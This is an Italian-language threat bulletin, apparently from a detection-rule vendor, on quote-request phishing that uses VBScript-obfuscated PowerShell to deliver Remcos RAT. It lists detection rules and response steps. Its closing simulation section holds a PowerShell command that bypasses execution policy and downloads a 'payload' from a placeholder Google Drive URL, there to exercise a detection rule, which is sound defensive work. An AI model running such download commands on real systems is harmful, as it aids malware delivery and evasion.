SOC Prime Bias: High

05 Oct 2026 16:41 UTC

Email di Richiesta di Preventivo Falsi Usati in Attacchi di Phishing con Malware

Author Photo
SOC Prime Team linkedin icon Segui
Email di Richiesta di Preventivo Falsi Usati in Attacchi di Phishing con Malware
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Sommario

Gli attori delle minacce stanno distribuendo email di phishing camuffate da richieste di preventivo per consegnare payload dannosi. La campagna usa VBScript per nascondere comandi PowerShell, che alla fine recuperano un payload a più stadi e Remcos RAT. Il malware finale supporta l’esecuzione remota di comandi, il keylogging e l’esfiltrazione di dati dai sistemi compromessi.

Indagine

Il Centro di Sicurezza di AhnLab (ASEC) ha identificato una campagna di phishing in cui gli archivi compressi contengono VBScripts nascosti. I ricercatori hanno scoperto un metodo di offuscamento che sfrutta notepad.exe per ricostruire il nome eseguibile ‘powershell’ e si basa sulla sostituzione di stringhe basata su token per i comandi PowerShell. Il payload a più stadi sfrutta anche oggetti COM per eseguire l’aggiramento UAC.

Mitigazione

Gli utenti dovrebbero convalidare il dominio dell’email del mittente e rimanere cauti quando aprono allegati o collegamenti inaspettati. Le organizzazioni dovrebbero configurare un filtro email per bloccare le estensioni di file sospette come .vbs, .exe e .js. Gli utenti dovrebbero anche evitare di inserire credenziali sensibili su URL non ufficiali o sospetti ricevuti tramite email non richieste.

Risposta

Quando viene rilevata un’attività dannosa, verificare la legittimità dell’email originale e indagare sull’attività sospetta dei file all’interno di %APPDATA%. Controllare l’esecuzione di PowerShell non autorizzata e gli indicatori associati a Remcos RAT. Isolare i sistemi compromessi dalla rete per prevenire ulteriori comunicazioni C2, attività laterali e potenziali esfiltrazioni di dati.

Flusso di Attacco

Stiamo ancora aggiornando questa parte.

Rilevamenti

LOLBAS WScript / CScript (tramite process_creation)

Squadra SOC Prime
01 Ott 2026

Possibile Infiltrazione / Esfiltrazione di Dati / C2 tramite Servizi / Strumenti di Terze Parti (tramite dns_query)

Squadra SOC Prime
01 Ott 2026

Possibile Infiltrazione / Esfiltrazione di Dati / C2 tramite Servizi / Strumenti di Terze Parti (tramite dns)

Squadra SOC Prime
01 Ott 2026

IOC (HashMd5) per rilevare: Phishing/Truffa Malware: Attenzione alle email di phishing camuffate da richieste di preventivo

Regole AI di SOC Prime
01 Ott 2026

IOC (SourceIP) per rilevare: Phishing/Truffa Malware: Attenzione alle email di phishing camuffate da richieste di preventivo

Regole AI di SOC Prime
01 Ott 2026

IOC (DestinationIP) per rilevare: Phishing/Truffa Malware: Attenzione alle email di phishing camuffate da richieste di preventivo

Regole AI di SOC Prime
01 Ott 2026

Rilevare Script PowerShell che si connette al Server C2 [Connessione di Rete Windows]

Regole AI di SOC Prime
01 Ott 2026

Esecuzione PowerShell dannosa tramite Offuscamento VBScript [Windows PowerShell]

Regole AI di SOC Prime
01 Ott 2026

Esecuzione Simulazione

  • Narrazione & Comandi di Attacco: Un attaccante invia un’email di spearphishing contenente un link a un documento. Quando l’utente clicca sul link, esegue un comando PowerShell nascosto progettato per estrarre uno script dannoso da un repository Google Drive. L’attaccante usa il parametro export=download per garantire che il file venga scaricato direttamente anziché visualizzato in un browser. L’obiettivo è eseguire un payload senza file in memoria per evitare gli antivirus basati su disco. Il comando è costruito per attivare la regola di rilevamento specifica che mira a questo modello di download.

  • Script di Test di Regressione:

    # Simulazione del download di un file tramite PowerShell da Google Drive tramite modello URL specifico
    $targetUrl = "https://drive.google.com/uc?export=download&id=1A2B3C4D5E6F7G8H9I0J"
    Start-Process powershell.exe -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `"Write-Host 'Scaricando payload...'; $data = Invoke-WebRequest -Uri '$targetUrl';`""
  • Comandi di Pulizia:

    # Nessun file viene scritto su disco in questa simulazione specifica, 
    # ma fermiamo il processo se è ancora in esecuzione.
    Stop-Process -Name "powershell" -ErrorAction SilentlyContinue